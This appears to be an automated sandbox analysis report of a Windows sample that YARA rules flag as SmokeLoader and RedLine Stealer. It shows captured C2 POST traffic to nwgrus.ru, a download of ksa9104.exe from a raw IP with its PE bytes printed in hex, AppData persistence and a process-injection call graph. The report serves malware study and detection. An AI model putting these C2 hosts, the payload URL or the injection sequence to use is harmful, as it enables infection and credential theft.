                              Date: Sat, 12 Oct 2024 18:10:41 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.560096175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:44.934335947 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://mqxuhbjviiy.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 264
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:44.934374094 CEST264OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 3c c4 f6
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu;<5Akd*Tk1%a7L#DQI\4y.] MXnxL7R7!|zEoJRUcS3_fbG}12s
                              Oct 12, 2024 20:10:46.361423016 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:46 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.560097175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:50.241883039 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://gbnguovvbpjawi.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 318
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:50.241919041 CEST318OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 18 a0 80
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu;HjY3jP-/)j\ixKxx2J"Y03TU3"kNT*7U*6'NQJ[^.Ej(Oyl;J
                              Oct 12, 2024 20:10:51.683959961 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              50192.168.2.560098175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:55.442645073 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://bkopsfqneci.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 290
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:55.442673922 CEST290OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 40 e3 e3
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu#@cNBk"sVr=#1}W7CK*He#7FjM$|$ERMV8B?R_v,uE+5MZT7$(0
                              Oct 12, 2024 20:10:56.903294086 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              51192.168.2.560099175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:11:02.607198000 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ugrocofopkun.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 164
                              Host: nwgrus.ru
                              Oct 12, 2024 20:11:02.607198000 CEST164OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 15 e5 f8
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vunQLF!cV>"1U'3pP>>5wM:7OcqE
                              Oct 12, 2024 20:11:04.022588015 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:11:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.55000123.145.40.1644431028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              2024-10-12 18:08:05 UTC162OUTGET /ksa9104.exe HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: 23.145.40.164
                              2024-10-12 18:08:06 UTC327INHTTP/1.1 200 OK
                              Date: Sat, 12 Oct 2024 18:08:05 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              X-Frame-Options: DENY
                              X-Content-Type-Options: nosniff
                              Last-Modified: Sat, 12 Oct 2024 18:00:02 GMT
                              ETag: "3b400-6244b5f680643"
                              Accept-Ranges: bytes
                              Content-Length: 242688
                              Connection: close
                              Content-Type: application/x-msdos-program
                              2024-10-12 18:08:06 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 bd 95 42 64 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*********F**********Rich*PELBd
                              2024-10-12 18:08:06 UTC8000INData Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c aa 41 00 68 74 67 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 67 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 92 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 67 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 61 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 92 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 61 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88
                              Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtgA+QP,t3VVVVVN3hpgASW,tVVVVV*E4ASW+tVVVVVh hHgAWP*2jaA;t$tjEP4A6,YP6SaA_^[j-Ytj
                              2024-10-12 18:08:06 UTC8000INData Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 8f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 aa 41 00 56 53 88 1d ec ab 41 00 ff 15 94 60 41 00 a1 60 8f b1 02 89 35 a4 a2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 a2 41 00 89 35 8c a2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 ab 41 00 83 ec 0c 53 56 8b 35 44 61 41 00 57 33 db 33 ff 3b c3 75 2e ff
                              Data Ascii: tBUME^[t US3VW9puhAVSA`A`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DaAW33;u.
                              2024-10-12 18:08:06 UTC8000INData Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 60 41 00 8d 85 28 fd ff ff 50 ff 15 d4 60 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80
                              Data Ascii: ffffffuE0@jPjPe(0j@,`A(P`AjUuMEMUTu}tMA#E3t3@
                              2024-10-12 18:08:06 UTC8000INData Raw: 0a c5 8a 19 6f 3b 68 75 21 e3 1f b2 10 d1 6e 2a 68 92 db af 29 1d 20 dd cc d2 c3 33 b9 e4 b7 52 48 06 5d 50 44 c3 57 75 f9 54 7a a9 b4 2f 7c 05 bb cb 25 03 3e 82 d3 40 04 fb 10 f0 0b 1f 78 e7 ea 29 80 ca 10 1f 71 44 be be ad 49 17 93 ff e7 fa 5a 0b d0 75 8d 28 eb 3a 8f 62 d8 46 f8 a4 83 b1 b3 cf b5 75 fe b0 ca ef f2 ae 20 04 6f 94 30 9b 23 88 de 73 3c 26 bf b7 a1 9b 49 8c ab 23 65 5e 9a 8e 3f b4 6c e5 3c 85 f5 07 80 71 fc da f5 0a 62 4e b2 53 19 77 24 b6 c4 92 81 de 7e c8 a6 82 6a a8 8b 35 15 76 8f 8e 82 f7 d8 10 c9 99 95 7b b7 7b cc bd a5 d7 ab e7 63 df a1 80 04 33 7c cc 74 ab 1a 5d 6d cb b3 dc 5c 3f a8 f9 30 22 3a d8 fb 5a cc 18 b2 88 42 f2 52 45 49 b0 f7 47 d5 6e bf d1 82 8c 58 16 7c fe f2 9e b0 89 47 85 db d1 39 e1 24 c4 05 e1 46 86 45 45 38 68 d9 fd
                              Data Ascii: o;hu!n*h) 3RH]PDWuTz/|%>@x)qDIZu(:bFu o0#s<&I#e^?l<qbNSw$~j5v{{c3|t]m\?0":ZBREIGnX|G9$FEE8h
                              2024-10-12 18:08:06 UTC8000INData Raw: 83 d0 06 e9 0d 9c 9d fb 01 b7 d8 5f d3 af d7 65 7d 09 0b f2 9a 1c bb 6d 93 6a ad 7f 68 8b b2 55 2c ba 52 d2 e3 bc ed dd e6 c0 57 0b 4a 3d ba 97 f6 fd 91 c6 b3 6a 16 52 c1 98 bd 3a e9 3d 12 75 fa de 44 9f 32 53 9f 6b a0 1b b5 ad 36 7c 76 45 93 4e 25 a9 f6 c2 82 d4 52 74 d4 40 42 dc 15 79 65 8f 11 14 31 77 96 db 8d b0 84 a8 e2 c1 89 54 08 af 0c 14 9c ff 8d c1 a7 fd 78 e2 31 a7 f9 02 5c 27 89 66 e1 97 f6 61 bd 71 16 49 63 64 91 a2 e6 a3 2f fe 2e e6 f7 8a 0f ea 3e 8a 87 59 78 16 99 45 dd 96 05 79 9e a2 81 39 0a 92 ec e5 13 0d a9 c7 40 90 09 78 fe e7 13 0c 88 3c a5 43 18 bb a1 0b 28 60 9a 3e 94 47 98 fa 68 74 e3 62 8a 6f 70 3b a1 e5 08 89 44 30 74 7b 8d 15 aa d2 a9 f7 60 b4 70 bf 4a 47 ad 27 41 7e e6 a7 a5 31 3f 80 74 dc 77 54 79 1d f4 b5 dc 24 84 76 3f 13 4c
                              Data Ascii: _e}mjhU,RWJ=jR:=uD2Sk6|vEN%Rt@Bye1wTx1\'faqIcd/.>YxEy9@x<C(`>Ghtbop;D0t{`pJG'A~1?twTy$v?L
                              2024-10-12 18:08:06 UTC8000INData Raw: 0b ca 5d 78 0d 6e d9 ee 30 68 e5 7a 87 b7 ac 65 97 54 1f 6a ea b8 20 df 4d c8 88 c7 f4 8c 6e 54 6f 6a 18 d3 e4 c4 75 c3 6a d8 10 60 0b 9e 70 17 85 53 c5 5b 43 2d 4b 15 2f 59 ca e4 43 d6 85 f3 22 73 51 87 87 f1 24 d7 ee 52 ef 14 77 5d c3 0f 46 90 e4 46 aa 7b 92 07 29 02 98 02 c4 50 59 63 04 0b 13 9a eb e2 49 a5 81 1f 50 98 2c 4e 78 f8 61 7b 82 85 0f 93 0d 93 9d f6 19 26 ed f7 f2 b8 76 dd 17 de 69 95 01 dd 86 49 bb af a3 dd 13 0e d1 1f b9 08 59 68 1e 43 f3 7d b0 9d 99 48 e1 26 e5 5c db a4 30 89 47 b1 3b b7 6a 4c 0a 31 5c 14 72 1d b2 c2 70 6b ac bd a8 1f 2a 0b 58 b6 56 3b ac 8e 80 59 07 12 49 cc 97 6a 5e 28 bf 10 0f af a0 f8 76 60 70 29 68 28 e7 55 50 4a 07 0d ae e5 68 db 24 d4 67 56 a9 23 44 47 17 f1 c3 ac 0d d6 ea 6e 56 4b 67 42 17 26 31 fa f9 04 ec 76 77
                              Data Ascii: ]xn0hzeTj MnTojuj`pS[C-K/YC"sQ$Rw]FF{)PYcIP,Nxa{&viIYhC}H&\0G;jL1\rpk*XV;YIj^(v`p)h(UPJh$gV#DGnVKgB&1vw
                              2024-10-12 18:08:06 UTC8000INData Raw: a8 a1 aa c1 a1 39 bd 00 40 35 0d 79 96 a8 7d 43 35 40 c8 e0 b2 cb a5 6a 43 44 57 bd d6 15 3e 10 56 b9 48 03 24 77 8c 10 16 59 b7 36 2a ba ee 37 0e e4 e6 ac 4a 3f 66 8e 19 ab 35 71 52 12 ef 28 8b bb ca 97 04 ed 5b 84 bc 2f e7 0f 11 b9 90 a2 99 d0 42 e3 ef c1 e6 75 e6 fa 22 62 30 ea d6 b0 2d c9 0e f4 8d 32 f8 da 1a 34 4d 9c 69 9f 8a f1 d6 1c ef 12 e5 c1 d0 be 89 1b e5 32 7a 9d a2 2c e0 ff 0c 04 03 61 4a 56 89 c8 c5 4a 14 ad 94 d3 3f 1b 63 b0 c9 9f 1d ca 63 a6 1f a5 1b 60 89 c2 ac 85 98 8e 0b fb e5 ff a3 48 7e a7 30 8d ca 06 a5 96 58 39 33 f8 52 29 6f 8e c6 1a b6 38 75 05 67 98 94 f2 d4 4c 24 36 24 b8 46 22 23 9a bf 23 86 dd 47 dc c5 52 dd 50 81 5c fe 1f f1 a8 c0 00 c9 96 2e 48 73 eb 5c 03 27 af dc 93 00 d7 55 63 8d dd fa bd 6a b2 2e 83 f4 7b ce 30 9d fa 1d
                              Data Ascii: 9@5y}C5@jCDW>VH$wY6*7J?f5qR([/Bu"b0-24Mi2z,aJVJ?cc`H~0X93R)o8ugL$6$F"##GRP\.Hs\'Ucj.{0
                              2024-10-12 18:08:06 UTC8000INData Raw: bc 31 2b 96 dd e0 ba ef 96 af 0d 99 e1 e4 82 7b 27 c5 04 ae e3 b8 40 60 3b 3e b7 e8 54 35 4e 7a bb 6d d7 72 38 de 9e ec 1d cd 1a 54 4c 11 b7 a7 a3 f3 79 0d 72 0d 8f 8f 06 6e 61 48 f5 56 c1 1a 6a 49 32 8d 9f 23 31 70 60 b1 0b 9f 44 c6 d6 de 50 68 96 bd 03 3c f2 2a 05 68 4c 63 43 d7 ef c4 3c 1f 8a 85 6e 1c aa bd e3 c5 c7 62 88 56 25 9f eb 2d 92 da 7f 2a 8d ba ed 46 a7 5c 82 70 3a 5c a3 1c 3a 4a d6 f2 d5 7d 20 8c f8 80 15 55 9f 5e 59 ba 72 77 9a 99 f2 30 28 0a ae 59 ad 6c 3f 6d 76 3c a3 08 98 42 65 d7 1e 3d 6a c4 84 aa bc 9d 0f 7a 54 ca 4e b8 c6 e5 ad f0 6f af 62 70 c4 8c 9e 28 ba 99 a1 5a 8f 2b 8f 0e 0d 4c 4a 66 88 f0 5b 9d 14 46 ac ef fc f5 62 7d 6b 6c c9 c7 64 9b 2c 49 26 a8 07 0e 2e 55 c3 b3 28 12 32 c8 99 f4 6b 0c 26 0b f4 cd 8a 14 02 e7 42 a0 ec ec a8
                              Data Ascii: 1+{'@`;>T5Nzmr8TLyrnaHVjI2#1p`DPh<*hLcC<nbV%-*F\p:\:J} U^Yrw0(Yl?mv<Be=jzTNobp(Z+LJf[Fb}kld,I&.U(2k&B
                              2024-10-12 18:08:06 UTC8000INData Raw: f7 ad 26 b9 cc ca ea f0 31 93 06 56 5e a8 a3 33 97 26 97 bd 6e 2f 31 e2 ac b9 61 ec 54 6e d3 88 bb cb fd ba d4 61 37 93 2a e9 b0 28 dd 8c 4e 3a 74 2c 24 1c 0a 09 19 28 78 67 df 7f d5 42 46 8c e8 8a c1 40 11 1e ac 5e 2f f0 72 9c 55 f8 84 f0 de 1f 76 e3 05 55 bb 71 88 49 13 0d b5 50 59 0c 6c 7a 8c c4 b2 c6 e3 a9 d1 0f 5e ef bc da 6c 0a fb 38 92 b7 23 69 62 01 1e e6 c4 b9 9f 3a 74 8f 58 39 59 35 d5 cd 79 d7 4c 23 88 50 1f 6d 49 f8 d3 16 b8 4a 30 a8 7f b9 58 b2 8b ca 23 37 b4 0c 7b 03 c6 50 88 7d c5 76 eb 53 8e 24 6c d1 ab 64 c6 1e 6d e0 36 35 2c 21 08 38 cb c6 2e c9 22 a1 47 0e 2f 3f cf f0 61 de 41 c4 b6 2b 04 25 8c 02 87 d3 f4 c4 7f 70 d5 53 d8 e7 65 16 39 d8 50 90 fa 2f 59 ab 56 30 47 6b b1 c2 69 7b fd 88 f4 05 94 e6 66 fd d9 b8 0c 1a 1d 5a bc f3 95 e8 a6
                              Data Ascii: &1V^3&n/1aTna7*(N:t,$(xgBF@^/rUvUqIPYlz^l8#ib:tX9Y5yL#PmIJ0X#7{P}vS$ldm65,!8."G/?aA+%pSe9P/YV0Gki{fZ


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:14:06:55
                              Start date:12/10/2024
                              Path:C:\Users\user\Desktop\mGFoU1INUk.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\mGFoU1INUk.exe"
                              Imagebase:0x400000
                              File size:243'200 bytes
                              MD5 hash:18DAA2C6A6F6385895582D4E9954D851
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:14:07:04
                              Start date:12/10/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff674740000
                              File size:5'141'208 bytes
                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:4
                              Start time:14:07:24
                              Start date:12/10/2024
                              Path:C:\Users\user\AppData\Roaming\ibjgueh
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\ibjgueh
                              Imagebase:0x400000
                              File size:243'200 bytes
                              MD5 hash:18DAA2C6A6F6385895582D4E9954D851
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 37%, ReversingLabs
                              • Detection: 36%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:14:10:02
                              Start date:12/10/2024
                              Path:C:\Users\user\AppData\Roaming\ibjgueh
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\ibjgueh
                              Imagebase:0x400000
                              File size:243'200 bytes
                              MD5 hash:18DAA2C6A6F6385895582D4E9954D851
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.8%
                                Dynamic/Decrypted Code Coverage:30.2%
                                Signature Coverage:43.2%
                                Total number of Nodes:162
                                Total number of Limit Nodes:6
                                execution_graph 3601 402e40 3603 402e37 3601->3603 3604 402edf 3603->3604 3605 4018e6 3603->3605 3606 4018f5 3605->3606 3607 40192e Sleep 3606->3607 3608 401949 3607->3608 3610 40195a 3608->3610 3611 401514 3608->3611 3610->3604 3612 401524 3611->3612 3613 4015c4 NtDuplicateObject 3612->3613 3615 4016e0 3612->3615 3614 4015e1 NtCreateSection 3613->3614 3613->3615 3616 401661 NtCreateSection 3614->3616 3617 401607 NtMapViewOfSection 3614->3617 3615->3610 3616->3615 3619 40168d 3616->3619 3617->3616 3618 40162a NtMapViewOfSection 3617->3618 3618->3616 3620 401648 3618->3620 3619->3615 3621 401697 NtMapViewOfSection 3619->3621 3620->3616 3621->3615 3622 4016be NtMapViewOfSection 3621->3622 3622->3615 3623 2fc003c 3624 2fc0049 3623->3624 3636 2fc0e0f SetErrorMode SetErrorMode 3624->3636 3629 2fc0265 3630 2fc02ce VirtualProtect 3629->3630 3632 2fc030b 3630->3632 3631 2fc0439 VirtualFree 3635 2fc04be LoadLibraryA 3631->3635 3632->3631 3634 2fc08c7 3635->3634 3637 2fc0223 3636->3637 3638 2fc0d90 3637->3638 3639 2fc0dad 3638->3639 3640 2fc0dbb GetPEB 3639->3640 3641 2fc0238 VirtualAlloc 3639->3641 3640->3641 3641->3629 3642 415fa0 3645 415ba0 3642->3645 3644 415fa5 3646 415bad 3645->3646 3647 415d90 3646->3647 3648 415c67 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3646->3648 3649 415da0 SetCommState 3647->3649 3653 415db9 3647->3653 3650 415ccd 7 API calls 3648->3650 3649->3647 3651 415d81 3650->3651 3652 415d7a PulseEvent 3650->3652 3651->3647 3652->3651 3654 415e86 3653->3654 3655 415dc6 7 API calls 3653->3655 3666 4157f0 LocalAlloc 3654->3666 3664 415e5a 3655->3664 3659 415e8b LoadLibraryA 3667 415820 GetModuleHandleW GetProcAddress VirtualProtect 3659->3667 3660 415edd 3668 415b10 3660->3668 3662 415ee2 3663 415f19 InterlockedDecrement 3662->3663 3665 415f2f 3662->3665 3663->3662 3664->3654 3665->3644 3666->3659 3667->3660 3669 415b39 QueryDosDeviceW 3668->3669 3670 415b4a 3668->3670 3669->3670 3679 4159b0 3670->3679 3673 415b65 3682 4159f0 3673->3682 3674 415b5d FreeEnvironmentStringsA 3674->3673 3677 415b8c 3677->3662 3678 415b7c HeapDestroy GetNumaHighestNodeNumber 3678->3677 3680 4159c1 FatalAppExitA GetModuleHandleW 3679->3680 3681 4159d3 3679->3681 3680->3681 3681->3673 3681->3674 3683 4159fd 3682->3683 3684 415a29 3683->3684 3685 415a18 BuildCommDCBA 3683->3685 3686 415a53 3684->3686 3687 415a31 WritePrivateProfileStringA FreeEnvironmentStringsA 3684->3687 3685->3686 3688 415ada 3686->3688 3690 415a89 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3686->3690 3691 4159e0 3686->3691 3687->3686 3688->3677 3688->3678 3690->3686 3694 415970 3691->3694 3695 415999 3694->3695 3696 41598c SetEvent 3694->3696 3695->3686 3696->3695 3776 401542 3777 40153b 3776->3777 3778 4015c4 NtDuplicateObject 3777->3778 3787 4016e0 3777->3787 3779 4015e1 NtCreateSection 3778->3779 3778->3787 3780 401661 NtCreateSection 3779->3780 3781 401607 NtMapViewOfSection 3779->3781 3783 40168d 3780->3783 3780->3787 3781->3780 3782 40162a NtMapViewOfSection 3781->3782 3782->3780 3784 401648 3782->3784 3785 401697 NtMapViewOfSection 3783->3785 3783->3787 3784->3780 3786 4016be NtMapViewOfSection 3785->3786 3785->3787 3786->3787 3697 2c49de2 3700 2c49def 3697->3700 3701 2c49dfe 3700->3701 